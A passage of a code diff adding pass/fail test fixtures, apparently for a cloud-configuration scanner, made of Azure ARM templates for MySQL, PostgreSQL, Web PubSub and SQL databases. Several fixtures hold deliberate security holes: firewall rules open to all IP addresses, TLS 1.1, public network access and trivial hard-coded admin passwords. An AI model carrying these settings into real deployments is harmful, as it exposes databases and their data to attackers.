+      "defaultValue": "GP_Gen5_2",
+      "metadata": {
+        "description": "Azure database for MySQL sku name "
+      }
+    },
+    "SkuSizeMB": {
+      "type": "int",
+      "defaultValue": 5120,
+      "metadata": {
+        "description": "Azure database for MySQL Sku Size "
+      }
+    },
+    "SkuTier": {
+      "type": "string",
+      "defaultValue": "GeneralPurpose",
+      "allowedValues": [
+        "Basic",
+        "GeneralPurpose",
+        "MemoryOptimized"
+      ],
+      "metadata": {
+        "description": "Azure database for MySQL pricing tier"
+      }
+    },
+    "skuFamily": {
+      "type": "string",
+      "defaultValue": "Gen5",
+      "metadata": {
+        "description": "Azure database for MySQL sku family"
+      }
+    },
+    "mysqlVersion": {
+      "type": "string",
+      "defaultValue": "8.0",
+      "allowedValues": [
+        "5.6",
+        "5.7",
+        "8.0"
+      ],
+      "metadata": {
+        "description": "MySQL version"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "backupRetentionDays": {
+      "type": "int",
+      "defaultValue": 7,
+      "metadata": {
+        "description": "MySQL Server backup retention days"
+      }
+    },
+    "geoRedundantBackup": {
+      "type": "string",
+      "defaultValue": "Disabled",
+      "metadata": {
+        "description": "Geo-Redundant Backup setting"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "defaultValue": "azure_mysql_vnet",
+      "metadata": {
+        "description": "Virtual Network Name"
+      }
+    },
+    "subnetName": {
+      "type": "string",
+      "defaultValue": "azure_mysql_subnet",
+      "metadata": {
+        "description": "Subnet Name"
+      }
+    },
+    "virtualNetworkRuleName": {
+      "type": "string",
+      "defaultValue": "AllowSubnet",
+      "metadata": {
+        "description": "Virtual Network RuleName"
+      }
+    },
+    "vnetAddressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Virtual Network Address Prefix"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Subnet Address Prefix"
+      }
+    }
+  },
+  "variables": {
+    "firewallrules": [
+      {
+        "Name": "rule1",
+        "StartIpAddress": "0.0.0.0",
+        "EndIpAddress": "255.255.255.255"
+      },
+      {
+        "Name": "rule2",
+        "StartIpAddress": "0.0.0.0",
+        "EndIpAddress": "255.255.255.255"
+      }
+    ]
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules",
+      "apiVersion": "2017-12-01",
+      "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]",
+      "properties": {
+        "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]",
+        "ignoreMissingVnetServiceEndpoint": true
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/virtualNetworks",
+      "apiVersion": "2023-09-01",
+      "name": "[parameters('virtualNetworkName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('vnetAddressPrefix')]"
+          ]
+        }
+      }
+    },
+    {
+      "type": "Microsoft.Network/virtualNetworks/subnets",
+      "apiVersion": "2023-09-01",
+      "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]",
+      "properties": {
+        "addressPrefix": "[parameters('subnetPrefix')]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.DBforMySQL/servers",
+      "apiVersion": "2017-12-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('skuName')]",
+        "tier": "[parameters('SkuTier')]",
+        "capacity": "[parameters('skuCapacity')]",
+        "size": "[format('{0}', parameters('SkuSizeMB'))]",
+        "family": "[parameters('skuFamily')]"
+      },
+      "properties": {
+        "createMode": "Default",
+        "version": "[parameters('mysqlVersion')]",
+        "administratorLogin": "[parameters('administratorLogin')]",
+        "administratorLoginPassword": "[parameters('administratorLoginPassword')]",
+        "storageProfile": {
+          "storageMB": "[parameters('SkuSizeMB')]",
+          "backupRetentionDays": "[parameters('backupRetentionDays')]",
+          "geoRedundantBackup": "[parameters('geoRedundantBackup')]"
+        },
+        "minimalTlsVersion": "TLS1_1",
+        "sslEnforcement": "Enabled"
+      }
+    },
+    {
+      "copy": {
+        "name": "firewallRules",
+        "count": "[length(variables('firewallrules'))]",
+        "mode": "serial",
+        "batchSize": 1
+      },
+      "type": "Microsoft.DBforMySQL/servers/firewallRules",
+      "apiVersion": "2017-12-01",
+      "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]",
+      "properties": {
+        "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]",
+        "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+      ]
+    }
+  ],
+  "outputs": {
+    "location": {
+      "type": "string",
+      "value": "[parameters('location')]"
+    },
+    "name": {
+      "type": "string",
+      "value": "[parameters('serverName')]"
+    },
+    "resourceGroupName": {
+      "type": "string",
+      "value": "[resourceGroup().name]"
+    },
+    "resourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json
new file mode 100644
index 00000000000..a464424d13c
--- /dev/null
+++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json
@@ -0,0 +1,257 @@
+
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "1923296876861958074"
+    }
+  },
+  "parameters": {
+    "serverName": {
+      "type": "string",
+      "metadata": {
+        "description": "Server Name for Azure database for MySQL"
+      }
+    },
+    "administratorLogin": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Database administrator login name"
+      }
+    },
+    "administratorLoginPassword": {
+      "type": "securestring",
+      "minLength": 8,
+      "metadata": {
+        "description": "Database administrator password"
+      }
+    },
+    "skuCapacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "GP_Gen5_2",
+      "metadata": {
+        "description": "Azure database for MySQL sku name "
+      }
+    },
+    "SkuSizeMB": {
+      "type": "int",
+      "defaultValue": 5120,
+      "metadata": {
+        "description": "Azure database for MySQL Sku Size "
+      }
+    },
+    "SkuTier": {
+      "type": "string",
+      "defaultValue": "GeneralPurpose",
+      "allowedValues": [
+        "Basic",
+        "GeneralPurpose",
+        "MemoryOptimized"
+      ],
+      "metadata": {
+        "description": "Azure database for MySQL pricing tier"
+      }
+    },
+    "skuFamily": {
+      "type": "string",
+      "defaultValue": "Gen5",
+      "metadata": {
+        "description": "Azure database for MySQL sku family"
+      }
+    },
+    "mysqlVersion": {
+      "type": "string",
+      "defaultValue": "8.0",
+      "allowedValues": [
+        "5.6",
+        "5.7",
+        "8.0"
+      ],
+      "metadata": {
+        "description": "MySQL version"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "backupRetentionDays": {
+      "type": "int",
+      "defaultValue": 7,
+      "metadata": {
+        "description": "MySQL Server backup retention days"
+      }
+    },
+    "geoRedundantBackup": {
+      "type": "string",
+      "defaultValue": "Disabled",
+      "metadata": {
+        "description": "Geo-Redundant Backup setting"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "defaultValue": "azure_mysql_vnet",
+      "metadata": {
+        "description": "Virtual Network Name"
+      }
+    },
+    "subnetName": {
+      "type": "string",
+      "defaultValue": "azure_mysql_subnet",
+      "metadata": {
+        "description": "Subnet Name"
+      }
+    },
+    "virtualNetworkRuleName": {
+      "type": "string",
+      "defaultValue": "AllowSubnet",
+      "metadata": {
+        "description": "Virtual Network RuleName"
+      }
+    },
+    "vnetAddressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Virtual Network Address Prefix"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Subnet Address Prefix"
+      }
+    }
+  },
+  "variables": {
+    "firewallrules": [
+      {
+        "Name": "rule1",
+        "StartIpAddress": "0.0.0.0",
+        "EndIpAddress": "255.255.255.255"
+      },
+      {
+        "Name": "rule2",
+        "StartIpAddress": "0.0.0.0",
+        "EndIpAddress": "255.255.255.255"
+      }
+    ]
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules",
+      "apiVersion": "2017-12-01",
+      "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]",
+      "properties": {
+        "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]",
+        "ignoreMissingVnetServiceEndpoint": true
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/virtualNetworks",
+      "apiVersion": "2023-09-01",
+      "name": "[parameters('virtualNetworkName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('vnetAddressPrefix')]"
+          ]
+        }
+      }
+    },
+    {
+      "type": "Microsoft.Network/virtualNetworks/subnets",
+      "apiVersion": "2023-09-01",
+      "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]",
+      "properties": {
+        "addressPrefix": "[parameters('subnetPrefix')]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.DBforMySQL/servers",
+      "apiVersion": "2017-12-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('skuName')]",
+        "tier": "[parameters('SkuTier')]",
+        "capacity": "[parameters('skuCapacity')]",
+        "size": "[format('{0}', parameters('SkuSizeMB'))]",
+        "family": "[parameters('skuFamily')]"
+      },
+      "properties": {
+        "createMode": "Default",
+        "version": "[parameters('mysqlVersion')]",
+        "administratorLogin": "[parameters('administratorLogin')]",
+        "administratorLoginPassword": "[parameters('administratorLoginPassword')]",
+        "storageProfile": {
+          "storageMB": "[parameters('SkuSizeMB')]",
+          "backupRetentionDays": "[parameters('backupRetentionDays')]",
+          "geoRedundantBackup": "[parameters('geoRedundantBackup')]"
+        },
+        "minimalTlsVersion": "TLS1_2",
+        "sslEnforcement": "Enabled"
+      }
+    },
+    {
+      "copy": {
+        "name": "firewallRules",
+        "count": "[length(variables('firewallrules'))]",
+        "mode": "serial",
+        "batchSize": 1
+      },
+      "type": "Microsoft.DBforMySQL/servers/firewallRules",
+      "apiVersion": "2017-12-01",
+      "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]",
+      "properties": {
+        "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]",
+        "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+      ]
+    }
+  ],
+  "outputs": {
+    "location": {
+      "type": "string",
+      "value": "[parameters('location')]"
+    },
+    "name": {
+      "type": "string",
+      "value": "[parameters('serverName')]"
+    },
+    "resourceGroupName": {
+      "type": "string",
+      "value": "[resourceGroup().name]"
+    },
+    "resourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json
new file mode 100644
index 00000000000..d0d5292e5c9
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json
@@ -0,0 +1,29 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2021-02-01",
+      "name": "fail1",
+      "location": "[azurerm_resource_group.example.location]",
+      "sku": {
+        "name": "GP_Gen5_4"
+      },
+      "properties": {
+        "administrator_login": "psqladminun",
+        "administrator_login_password": "1234",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7,
+          "geoRedundantBackup": "Enabled",
+          "auto_grow_enabled": "Enabled"
+        },
+        "publicNetworkAccess": "Enabled",
+        "ssl_enforcement_enabled": true,
+        "ssl_minimal_tls_version_enforced": "TLS1_2"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json
new file mode 100644
index 00000000000..286cc40d588
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json
@@ -0,0 +1,29 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "location": "[azurerm_resource_group.example.location]",
+      "sku": {
+        "name": "GP_Gen5_4"
+      },
+      "properties": {
+        "administrator_login": "psqladminun",
+        "administrator_login_password": "1234",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7,
+          "geoRedundantBackup": "Enabled",
+          "auto_grow_enabled": "Enabled"
+        },
+        "publicNetworkAccess": "Enabled",
+        "ssl_enforcement_enabled": true,
+        "ssl_minimal_tls_version_enforced": "TLS1_2"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json
new file mode 100644
index 00000000000..087bdef5630
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "[azurerm_resource_group.example.location]",
+      "properties": {
+        "administrator_login": "psqladminun",
+        "administrator_login_password": "1234",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7,
+          "geoRedundantBackup": "Enabled",
+          "auto_grow_enabled": "Enabled"
+        },
+        "publicNetworkAccess": "Disabled",
+        "ssl_enforcement_enabled": true,
+        "ssl_minimal_tls_version_enforced": "TLS1_2"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json
new file mode 100644
index 00000000000..5596d39fa19
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json
@@ -0,0 +1,27 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2017-12-01",
+      "name": "fail1",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "administratorLogin": "psqladminun",
+        "administratorLoginPassword": "blabla",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7,
+          "geoRedundantBackup": "Disabled"
+        },
+        "sslEnforcement": "Enabled",
+        "minimalTlsVersion": "TLS1_2"
+      },
+      "sku": {
+        "name": "GP_Gen5_4"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json
new file mode 100644
index 00000000000..ba14b8f7001
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2017-12-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "administratorLogin": "psqladminun",
+        "administratorLoginPassword": "blabla",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7
+        },
+        "sslEnforcement": "Enabled",
+        "minimalTlsVersion": "TLS1_2"
+      },
+      "sku": {
+        "name": "GP_Gen5_4"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json
new file mode 100644
index 00000000000..cfd6508c642
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json
@@ -0,0 +1,27 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DBforPostgreSQL/servers",
+      "apiVersion": "2017-12-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "administratorLogin": "psqladminun",
+        "administratorLoginPassword": "blabla",
+        "version": "9.6",
+        "storageProfile": {
+          "storageMB": 640000,
+          "backupRetentionDays": 7,
+          "geoRedundantBackup": "Enabled"
+        },
+        "sslEnforcement": "Enabled",
+        "minimalTlsVersion": "TLS1_2"
+      },
+      "sku": {
+        "name": "GP_Gen5_4"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json b/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json
new file mode 100644
index 00000000000..7ddcc188e35
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json
@@ -0,0 +1,127 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.13.1.58284",
+      "templateHash": "18262070107935981048"
+    }
+  },
+  "parameters": {
+    "wpsName": {
+      "type": "string",
+      "defaultValue": "[uniqueString(resourceGroup().id)]",
+      "minLength": 3,
+      "maxLength": 63,
+      "metadata": {
+        "description": "The name for your new Web PubSub instance."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The region in which to create the new instance, defaults to the same location as the resource group."
+      }
+    },
+    "unitCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "allowedValues": [
+        1,
+        2,
+        5,
+        10,
+        20,
+        50,
+        100
+      ],
+      "metadata": {
+        "description": "Unit count"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Free_F1",
+      "allowedValues": [
+        "Standard_S1",
+        "Free_F1"
+      ],
+      "metadata": {
+        "description": "SKU name"
+      }
+    },
+    "pricingTier": {
+      "type": "string",
+      "defaultValue": "Free",
+      "allowedValues": [
+        "Free",
+        "Standard"
+      ],
+      "metadata": {
+        "description": "Pricing tier"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.SignalRService/webPubSub",
+      "apiVersion": "2021-10-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "capacity": "[parameters('unitCount')]",
+        "name": "Free_F1",
+        "tier": "[parameters('pricingTier')]"
+      },
+      "identity": {
+        "type": "None"
+      },
+      "properties": {
+        "disableAadAuth": false,
+        "disableLocalAuth": false,
+        "liveTraceConfiguration": {
+          "categories": [
+            {
+              "enabled": "false",
+              "name": "ConnectivityLogs"
+            },
+            {
+              "enabled": "false",
+              "name": "MessagingLogs"
+            }
+          ],
+          "enabled": "false"
+        },
+        "networkACLs": {
+          "defaultAction": "Deny",
+          "publicNetwork": {
+            "allow": [
+              "ServerConnection",
+              "ClientConnection",
+              "RESTAPI",
+              "Trace"
+            ]
+          }
+        },
+        "publicNetworkAccess": "Enabled",
+        "resourceLogConfiguration": {
+          "categories": [
+            {
+              "enabled": "true",
+              "name": "ConnectivityLogs"
+            },
+            {
+              "enabled": "true",
+              "name": "MessagingLogs"
+            }
+          ]
+        },
+        "tls": {
+          "clientCertEnabled": false
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json b/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json
new file mode 100644
index 00000000000..2c46bc3a699
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json
@@ -0,0 +1,127 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.13.1.58284",
+      "templateHash": "18262070107935981048"
+    }
+  },
+  "parameters": {
+    "wpsName": {
+      "type": "string",
+      "defaultValue": "[uniqueString(resourceGroup().id)]",
+      "minLength": 3,
+      "maxLength": 63,
+      "metadata": {
+        "description": "The name for your new Web PubSub instance."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The region in which to create the new instance, defaults to the same location as the resource group."
+      }
+    },
+    "unitCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "allowedValues": [
+        1,
+        2,
+        5,
+        10,
+        20,
+        50,
+        100
+      ],
+      "metadata": {
+        "description": "Unit count"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Free_F1",
+      "allowedValues": [
+        "Standard_S1",
+        "Free_F1"
+      ],
+      "metadata": {
+        "description": "SKU name"
+      }
+    },
+    "pricingTier": {
+      "type": "string",
+      "defaultValue": "Free",
+      "allowedValues": [
+        "Free",
+        "Standard"
+      ],
+      "metadata": {
+        "description": "Pricing tier"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.SignalRService/webPubSub",
+      "apiVersion": "2021-10-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "capacity": "[parameters('unitCount')]",
+        "name": "Standard_S1",
+        "tier": "[parameters('pricingTier')]"
+      },
+      "identity": {
+        "type": "None"
+      },
+      "properties": {
+        "disableAadAuth": false,
+        "disableLocalAuth": false,
+        "liveTraceConfiguration": {
+          "categories": [
+            {
+              "enabled": "false",
+              "name": "ConnectivityLogs"
+            },
+            {
+              "enabled": "false",
+              "name": "MessagingLogs"
+            }
+          ],
+          "enabled": "false"
+        },
+        "networkACLs": {
+          "defaultAction": "Deny",
+          "publicNetwork": {
+            "allow": [
+              "ServerConnection",
+              "ClientConnection",
+              "RESTAPI",
+              "Trace"
+            ]
+          }
+        },
+        "publicNetworkAccess": "Enabled",
+        "resourceLogConfiguration": {
+          "categories": [
+            {
+              "enabled": "true",
+              "name": "ConnectivityLogs"
+            },
+            {
+              "enabled": "true",
+              "name": "MessagingLogs"
+            }
+          ]
+        },
+        "tls": {
+          "clientCertEnabled": false
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json
new file mode 100644
index 00000000000..cbf15bc37af
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json
@@ -0,0 +1,32 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.SignalRService/webPubSub",
+      "apiVersion": "2021-02-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Free_F1",
+        "capacity": 1
+      },
+      "properties": {
+        "liveTraceConfiguration": {
+          "enabled": "true",
+          "categories": [
+            {
+              "name": "MessagingLogs",
+              "enabled": "true"
+            },
+            {
+              "name": "ConnectivityLogs",
+              "enabled": "false"
+            }
+          ]
+        }
+      },
+      "publicNetworkAccess": "Disabled"
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json
new file mode 100644
index 00000000000..21e588b8bff
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json
@@ -0,0 +1,35 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.SignalRService/webPubSub",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Standard_S1",
+        "capacity": 1
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "liveTraceConfiguration": {
+          "enabled": "true",
+          "categories": [
+            {
+              "name": "MessagingLogs",
+              "enabled": "true"
+            },
+            {
+              "name": "ConnectivityLogs",
+              "enabled": "false"
+            }
+          ]
+        }
+      },
+      "publicNetworkAccess": "Disabled"
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json
new file mode 100644
index 00000000000..da9da23ff57
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json
@@ -0,0 +1,35 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.SignalRService/webPubSub",
+      "apiVersion": "2021-02-01",
+      "name": "pass2",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "Standard_S1",
+        "capacity": 1
+      },
+      "identity": {
+        "type": "UserAssigned"
+      },
+      "properties": {
+        "liveTraceConfiguration": {
+          "enabled": "true",
+          "categories": [
+            {
+              "name": "MessagingLogs",
+              "enabled": "true"
+            },
+            {
+              "name": "ConnectivityLogs",
+              "enabled": "false"
+            }
+          ]
+        }
+      },
+      "publicNetworkAccess": "Disabled"
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json
new file mode 100644
index 00000000000..cc5468e7f6c
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json
@@ -0,0 +1,24 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases",
+      "apiVersion": "2014-04-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "collation": "SQL_Latin1_General_CP1_CI_AS",
+        "licenseType": "LicenseIncluded",
+        "maxSizeBytes": 4,
+        "readScale": "Enabled"
+      },
+      "sku": {
+        "name": "S0"
+      },
+      "tags": {
+        "environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json
new file mode 100644
index 00000000000..da2202c28fc
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases",
+      "apiVersion": "2014-04-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "collation": "SQL_Latin1_General_CP1_CI_AS",
+        "licenseType": "LicenseIncluded",
+        "maxSizeBytes": 4,
+        "readScale": "Enabled",
+        "zoneRedundant": false
+      },
+      "sku": {
+        "name": "S0"
+      },
+      "tags": {
+        "environment": "Production"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json
new file mode 100644
